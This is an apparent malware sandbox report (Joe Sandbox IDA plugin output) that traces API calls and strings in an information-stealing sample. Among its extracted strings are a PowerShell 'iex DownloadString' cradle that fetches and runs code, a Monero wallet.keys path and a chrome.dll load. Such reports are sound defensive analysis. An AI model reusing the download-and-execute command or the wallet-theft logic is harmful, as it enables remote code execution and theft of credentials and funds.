                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                        • String ID:
                                        • API String ID: 2540262943-0
                                        • Opcode ID: a74ede6c86167300b7a874fd00e1b3a5bb0a01b81571ccdfcd743e0ea1d83bff
                                        • Instruction ID: 311503621352c526ee3598d427847a502b7addbfbc4f273770acfbc74fad664f
                                        • Opcode Fuzzy Hash: a74ede6c86167300b7a874fd00e1b3a5bb0a01b81571ccdfcd743e0ea1d83bff
                                        • Instruction Fuzzy Hash: 473195F690021867DB28F7B0ED85EDD73BCAB58700F40458DB245A6049DE75A7C8CF94
                                        APIs
                                          • Part of subcall function 00E2AA50: lstrcpy.KERNEL32(00E30E1A,00000000), ref: 00E2AA98
                                          • Part of subcall function 00E2ACC0: lstrlen.KERNEL32(?,01A88B68,?,\Monero\wallet.keys,00E30E1A), ref: 00E2ACD5
                                          • Part of subcall function 00E2ACC0: lstrcpy.KERNEL32(00000000), ref: 00E2AD14
                                          • Part of subcall function 00E2ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E2AD22
                                          • Part of subcall function 00E2AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E2AC82
                                          • Part of subcall function 00E2AC30: lstrcat.KERNEL32(00000000), ref: 00E2AC92
                                          • Part of subcall function 00E2ABB0: lstrcpy.KERNEL32(?,00E30E1A), ref: 00E2AC15
                                        • ShellExecuteEx.SHELL32(0000003C), ref: 00E22FD5
                                        Strings
                                        • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00E22F14
                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00E22F54
                                        • ')", xrefs: 00E22F03
                                        • <, xrefs: 00E22F89
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                        • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        • API String ID: 3031569214-898575020
                                        • Opcode ID: 327271982e049667bdf8b58e40072cc6e1f3b215b168da25b41b492da87e5783
                                        • Instruction ID: f01a01f24ecf72e907f160ad07942e001790e526e52c95b0405abdcd8263efb2
                                        • Opcode Fuzzy Hash: 327271982e049667bdf8b58e40072cc6e1f3b215b168da25b41b492da87e5783
                                        • Instruction Fuzzy Hash: D9410F71D102189BDB14FFA0E862FDDBBB9AF10300F486469E00677192DF752A49CF51
                                        APIs
                                        • RegOpenKeyExA.ADVAPI32(80000001,01A8DA58,00000000,00020119,?), ref: 00E24344
                                        • RegQueryValueExA.ADVAPI32(?,01A8EFF8,00000000,00000000,00000000,000000FF), ref: 00E24368
                                        • RegCloseKey.ADVAPI32(?), ref: 00E24372
                                        • lstrcat.KERNEL32(?,00000000), ref: 00E24397
                                        • lstrcat.KERNEL32(?,01A8EE48), ref: 00E243AB
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$CloseOpenQueryValue
                                        • String ID:
                                        • API String ID: 690832082-0
                                        • Opcode ID: 7f25e476a3196d8b4a1ed067fc48848c4c3aa01128c1fc71b2038c08efb45a59
                                        • Instruction ID: 784819ca7ffc47cb1e2e5069e392ea31f402f9509c987a44e8d254a05cc9e4de
                                        • Opcode Fuzzy Hash: 7f25e476a3196d8b4a1ed067fc48848c4c3aa01128c1fc71b2038c08efb45a59
                                        • Instruction Fuzzy Hash: 8841CBB69001086BDF24EBA0FC46FEE73BDAB98700F00459CB7565A1C5EE7656C88BD1
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: dllmain_raw$dllmain_crt_dispatch
                                        • String ID:
                                        • API String ID: 3136044242-0
                                        • Opcode ID: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                                        • Instruction ID: ad2182a34f43c74332ad05f86648f454d6b035243f3bfde2d38ba84708e71878
                                        • Opcode Fuzzy Hash: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                                        • Instruction Fuzzy Hash: 52218172D40618ABDB22BE55CD419BFBAA9EB82798F266115F90D77211C3304D41CBB0
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E27FC7
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00E27FCE
                                        • RegOpenKeyExA.ADVAPI32(80000002,01A7B590,00000000,00020119,?), ref: 00E27FEE
                                        • RegQueryValueExA.ADVAPI32(?,01A8D8F8,00000000,00000000,000000FF,000000FF), ref: 00E2800F
                                        • RegCloseKey.ADVAPI32(?), ref: 00E28022
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                        • String ID:
                                        • API String ID: 3225020163-0
                                        • Opcode ID: 4b87b944fc9598c6ffd484bbe89ac0a036c015de15d2bb1b1e6d0c77d362aa7f
                                        • Instruction ID: a2f3018cad63a3d9601eb45e73dd2c04cac74aa64af9042945b4b0671826147f
                                        • Opcode Fuzzy Hash: 4b87b944fc9598c6ffd484bbe89ac0a036c015de15d2bb1b1e6d0c77d362aa7f
                                        • Instruction Fuzzy Hash: 40118FB1A44305EBE710CB85ED46FAFBBB8EB04B10F104219F611AB284DB7A58008BA1
                                        APIs
                                        • StrStrA.SHLWAPI(01A8EED8,00000000,00000000,?,00E19F71,00000000,01A8EED8,00000000), ref: 00E293FC
                                        • lstrcpyn.KERNEL32(010E7580,01A8EED8,01A8EED8,?,00E19F71,00000000,01A8EED8), ref: 00E29420
                                        • lstrlen.KERNEL32(00000000,?,00E19F71,00000000,01A8EED8), ref: 00E29437
                                        • wsprintfA.USER32 ref: 00E29457
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpynlstrlenwsprintf
                                        • String ID: %s%s
                                        • API String ID: 1206339513-3252725368
                                        • Opcode ID: 04adc2dec78ec723048a33ffde8ec7394b7ede64c70df9e6a23a3efe953d2df0
                                        • Instruction ID: c381dfe02e09a9f337634a3992feb0d3729950124f75f02d4479c25c305b6484
                                        • Opcode Fuzzy Hash: 04adc2dec78ec723048a33ffde8ec7394b7ede64c70df9e6a23a3efe953d2df0
                                        • Instruction Fuzzy Hash: 81015E76500208FFDB08DFA9D888EAE7BB8EB08704F108248F9499B205D671EA40DBD1
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E112B4
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00E112BB
                                        • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00E112D7
                                        • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00E112F5
                                        • RegCloseKey.ADVAPI32(?), ref: 00E112FF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                        • String ID:
                                        • API String ID: 3225020163-0
                                        • Opcode ID: bb825b5d2f215b7eb33c7f8fe1d083f5e0aca3b078f18c2557638e7cc7abf26e
                                        • Instruction ID: 49888f5dab3c687e99dccd889dc7f6dab2be2a1eaab64d9b882066599482cdea
                                        • Opcode Fuzzy Hash: bb825b5d2f215b7eb33c7f8fe1d083f5e0aca3b078f18c2557638e7cc7abf26e
                                        • Instruction Fuzzy Hash: 3E013179A40309BFDB10DFD5DC49FAEB7B8EB48B00F004198FA459B284D7759A00CB90
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: String___crt$Type
                                        • String ID:
                                        • API String ID: 2109742289-3916222277
                                        • Opcode ID: 5e1d8b3a628e78bc3cee1eb59820b0238238ac2cd481b1de884bb5299b334a5a
                                        • Instruction ID: 01fdff47a3be1b2fe4658ddea2c0ca3ac9710a9e683dae50155083e56229e45c
                                        • Opcode Fuzzy Hash: 5e1d8b3a628e78bc3cee1eb59820b0238238ac2cd481b1de884bb5299b334a5a
                                        • Instruction Fuzzy Hash: A241E7B01047AC5FDB218B24DC85FFFBBE8AB45708F2454E8E98AA6142D2719A44DF60
                                        APIs
                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00E26903
                                          • Part of subcall function 00E2AA50: lstrcpy.KERNEL32(00E30E1A,00000000), ref: 00E2AA98
                                          • Part of subcall function 00E2ACC0: lstrlen.KERNEL32(?,01A88B68,?,\Monero\wallet.keys,00E30E1A), ref: 00E2ACD5
                                          • Part of subcall function 00E2ACC0: lstrcpy.KERNEL32(00000000), ref: 00E2AD14
                                          • Part of subcall function 00E2ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E2AD22
                                          • Part of subcall function 00E2ABB0: lstrcpy.KERNEL32(?,00E30E1A), ref: 00E2AC15
                                        • ShellExecuteEx.SHELL32(0000003C), ref: 00E269C6
                                        • ExitProcess.KERNEL32 ref: 00E269F5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                        • String ID: <
                                        • API String ID: 1148417306-4251816714
                                        • Opcode ID: df7b11afbc6944a79a132080baa97a943ce1437bf70b4092f1ea462b2a94bb37
                                        • Instruction ID: ee51a5bc1fd587a6eb3c69c194ac582ff65deeced709dda71e10990237a93b37
                                        • Opcode Fuzzy Hash: df7b11afbc6944a79a132080baa97a943ce1437bf70b4092f1ea462b2a94bb37
                                        • Instruction Fuzzy Hash: 393161B1901228ABDB18EB90ED92FDDB7B8AF04700F445198F20577185DF756B48CF55
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00E30E10,00000000,?), ref: 00E289BF
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00E289C6
                                        • wsprintfA.USER32 ref: 00E289E0
                                          • Part of subcall function 00E2AA50: lstrcpy.KERNEL32(00E30E1A,00000000), ref: 00E2AA98
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateProcesslstrcpywsprintf
                                        • String ID: %dx%d
                                        • API String ID: 1695172769-2206825331
                                        • Opcode ID: 789f0253db3018191f401208dfdc9921706c00200ab1ee1b600dd540b421a6f0
                                        • Instruction ID: 3bc22303a0b2a9cc85fd147eb14949cc4278f1de5d2d658fcf78ad9bc8f355a6
                                        • Opcode Fuzzy Hash: 789f0253db3018191f401208dfdc9921706c00200ab1ee1b600dd540b421a6f0
                                        • Instruction Fuzzy Hash: 0A2160B1A40304AFDB14DF99DD45FAEBBB8FB48B01F104559F605BB284C77A9900CBA0
                                        APIs
                                        • LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00E1A098
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: LibraryLoad
                                        • String ID: C:\ProgramData\chrome.dll$connect_to_websocket$free_result
                                        • API String ID: 1029625771-1545816527
                                        • Opcode ID: 37bfca5e64251d12480ba6c3ed31f571ffa8e26c2cc68334393b4a3945bc5f76
                                        • Instruction ID: c86bfabfa4275031032a60b5d4ab19d46a43d9284d05d817593453954bd5602b
                                        • Opcode Fuzzy Hash: 37bfca5e64251d12480ba6c3ed31f571ffa8e26c2cc68334393b4a3945bc5f76
                                        • Instruction Fuzzy Hash: 80F06278646300EFC7219B66E90C7A63AE4E305B00F003568F855AB184C3BE98C5C792
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00E296AE,00000000), ref: 00E28EEB
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00E28EF2
                                        • wsprintfW.USER32 ref: 00E28F08
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateProcesswsprintf
                                        • String ID: %hs
                                        • API String ID: 769748085-2783943728
                                        • Opcode ID: 4a8137ea7add64987bbd1bc293c2438e786df04bdccef2edc272c053bc3be240
                                        • Instruction ID: 6184d69c83452c8ca8ca3f3f662505dea9b565c18bb1f587c25c8f26c2640605
                                        • Opcode Fuzzy Hash: 4a8137ea7add64987bbd1bc293c2438e786df04bdccef2edc272c053bc3be240
                                        • Instruction Fuzzy Hash: 21E0EC75A44309BBDB24DBD5DD0AE6D7BB8EB05B02F000198FE499B340DA769E109BD1
                                        APIs
                                          • Part of subcall function 00E2AA50: lstrcpy.KERNEL32(00E30E1A,00000000), ref: 00E2AA98
                                          • Part of subcall function 00E2ACC0: lstrlen.KERNEL32(?,01A88B68,?,\Monero\wallet.keys,00E30E1A), ref: 00E2ACD5
                                          • Part of subcall function 00E2ACC0: lstrcpy.KERNEL32(00000000), ref: 00E2AD14
                                          • Part of subcall function 00E2ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E2AD22
                                          • Part of subcall function 00E2ABB0: lstrcpy.KERNEL32(?,00E30E1A), ref: 00E2AC15
                                          • Part of subcall function 00E28CF0: GetSystemTime.KERNEL32(00E30E1B,01A8E550,00E305B6,?,?,00E113F9,?,0000001A,00E30E1B,00000000,?,01A88B68,?,\Monero\wallet.keys,00E30E1A), ref: 00E28D16
                                          • Part of subcall function 00E2AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E2AC82
                                          • Part of subcall function 00E2AC30: lstrcat.KERNEL32(00000000), ref: 00E2AC92
                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00E1AA11
                                        • lstrlen.KERNEL32(00000000,00000000), ref: 00E1AB2F
                                        • lstrlen.KERNEL32(00000000), ref: 00E1ADEC
                                          • Part of subcall function 00E2AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00E2AAF6
                                        • DeleteFileA.KERNEL32(00000000), ref: 00E1AE73
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                        • String ID:
                                        • API String ID: 211194620-0
                                        • Opcode ID: 8ff5b125a5899fe623410759cfdbff09bfa6b91ec628f3c387696b1c0cba93cf
                                        • Instruction ID: 834d19fa32fae14a36569f0f13313424315dec427581c1a68fd82cec259280e5
                                        • Opcode Fuzzy Hash: 8ff5b125a5899fe623410759cfdbff09bfa6b91ec628f3c387696b1c0cba93cf
                                        • Instruction Fuzzy Hash: F7E106729101289BCB14FBA4ED62EEE7379AF14300F4895A9F51776091DF316A4CCB62
                                        APIs
                                          • Part of subcall function 00E2AA50: lstrcpy.KERNEL32(00E30E1A,00000000), ref: 00E2AA98
                                          • Part of subcall function 00E2ACC0: lstrlen.KERNEL32(?,01A88B68,?,\Monero\wallet.keys,00E30E1A), ref: 00E2ACD5
                                          • Part of subcall function 00E2ACC0: lstrcpy.KERNEL32(00000000), ref: 00E2AD14
                                          • Part of subcall function 00E2ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E2AD22
                                          • Part of subcall function 00E2ABB0: lstrcpy.KERNEL32(?,00E30E1A), ref: 00E2AC15
                                          • Part of subcall function 00E28CF0: GetSystemTime.KERNEL32(00E30E1B,01A8E550,00E305B6,?,?,00E113F9,?,0000001A,00E30E1B,00000000,?,01A88B68,?,\Monero\wallet.keys,00E30E1A), ref: 00E28D16
                                          • Part of subcall function 00E2AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E2AC82
                                          • Part of subcall function 00E2AC30: lstrcat.KERNEL32(00000000), ref: 00E2AC92
                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00E1D581
                                        • lstrlen.KERNEL32(00000000), ref: 00E1D798
                                        • lstrlen.KERNEL32(00000000), ref: 00E1D7AC
                                        • DeleteFileA.KERNEL32(00000000), ref: 00E1D82B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                        • String ID:
                                        • API String ID: 211194620-0
                                        • Opcode ID: cbcabe42554e6a353b2a9bd825f38abf0e7b8ae29829b65601e79c84029a0017
                                        • Instruction ID: 2b765520036fd2cec06038a0be4cd5df2a88fe40adc88d00e8b5eed594ca17a5
                                        • Opcode Fuzzy Hash: cbcabe42554e6a353b2a9bd825f38abf0e7b8ae29829b65601e79c84029a0017
                                        • Instruction Fuzzy Hash: 07913672D101289BCB14FBA4EDA6EEE73B9AF14300F485578F51776091EF346A48CB62
                                        APIs
                                          • Part of subcall function 00E2AA50: lstrcpy.KERNEL32(00E30E1A,00000000), ref: 00E2AA98
                                          • Part of subcall function 00E2ACC0: lstrlen.KERNEL32(?,01A88B68,?,\Monero\wallet.keys,00E30E1A), ref: 00E2ACD5
                                          • Part of subcall function 00E2ACC0: lstrcpy.KERNEL32(00000000), ref: 00E2AD14
                                          • Part of subcall function 00E2ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E2AD22
                                          • Part of subcall function 00E2ABB0: lstrcpy.KERNEL32(?,00E30E1A), ref: 00E2AC15
                                          • Part of subcall function 00E28CF0: GetSystemTime.KERNEL32(00E30E1B,01A8E550,00E305B6,?,?,00E113F9,?,0000001A,00E30E1B,00000000,?,01A88B68,?,\Monero\wallet.keys,00E30E1A), ref: 00E28D16
                                          • Part of subcall function 00E2AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E2AC82
                                          • Part of subcall function 00E2AC30: lstrcat.KERNEL32(00000000), ref: 00E2AC92
                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00E1D901
                                        • lstrlen.KERNEL32(00000000), ref: 00E1DA9F
                                        • lstrlen.KERNEL32(00000000), ref: 00E1DAB3
                                        • DeleteFileA.KERNEL32(00000000), ref: 00E1DB32
                                        Memory Dump Source
